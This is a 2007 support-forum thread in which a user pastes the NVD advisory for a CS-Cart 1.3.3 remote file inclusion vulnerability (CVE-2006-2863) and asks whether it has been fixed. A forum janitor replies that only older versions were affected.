Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

cscart-classesdir-file-include Rate Topic   - - - - -

 
  • fwhorch
  • Junior Member
  • Members
  • Join Date: 07-Nov 07
  • 20 posts

Posted 18 November 2007 - 05:10 AM #1

Has this known security hole in cs-cart been fixed?

See http://nvd.nist.gov/...e=CVE-2006-2863

National Cyber-Alert System
Vulnerability Summary CVE-2006-2863
Original release date: 6/6/2006
Last revised: 10/30/2006
Source: US-CERT/NIST

Overview

PHP remote file inclusion vulnerability in class.cs_phpmailer.php in CS-Cart 1.3.3 allows remote attackers to execute arbitrary PHP code via a URL in the classes_dir parameter.

Impact

CVSS Severity (version 2.0 upgrade from v1.0):
CVSS v2 Base score: 5.1 (Medium) (AV:N/AC:H/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 4.9

Access Vector: Network exploitable
Access Complexity: High
Authentication: Not required to exploit
Impact Type: Provides unauthorized access, Allows partial confidentiality, integrity, and availability violation , Allows unauthorized disclosure of information , Allows disruption of service

Solution

Successful exploitation requires that "register_globals" is enabled.

References to Advisories, Solutions, and Tools

External Source: BID (disclaimer)

Name: 18263

Hyperlink: http://www.securityfocus.com/bid/18263

External Source: FRSIRT (disclaimer)

Name: ADV-2006-2125

Type: Advisory
Hyperlink: http://www.frsirt.co...ories/2006/2125

External Source: MLIST (disclaimer)

Name: [VIM] 20060606 CS-Cart: request for information (fwd)

Hyperlink: http://www.attrition...une/000824.html

External Source: SECUNIA (disclaimer)

Name: 20440

Type: Advisory
Hyperlink: http://secunia.com/advisories/20440

External Source: Milw0rm (disclaimer)

Name: exploit 1872

Hyperlink: http://milw0rm.com/exploits/1872

External Source: XF (disclaimer)

Name: cscart-classesdir-file-include(26911)

Hyperlink: http://xforce.iss.ne...orce/xfdb/26911


Vulnerable software and versions

Configuration 1
− CS-Cart, CS-Cart, 1.3.3, and previous
− CS-Cart, CS-Cart, 1.3.0

 
  • snorocket
  • Forum Janitor
  • Members
  • Join Date: 15-Mar 06
  • 2519 posts

Posted 19 November 2007 - 04:22 PM #2

Has this known security hole in cs-cart been fixed?

Yes, it only affected versions:
CS-Cart, CS-Cart, 1.3.3, and previous
CS-Cart, CS-Cart, 1.3.0
SNOROCKET.COM, Now Accepting PRE-ORDERS:
Customer Service (Helpdesk) Addon for CS-Cart v4.3.1
Quote and Invoicing Addon for CS-Cart v4.3.1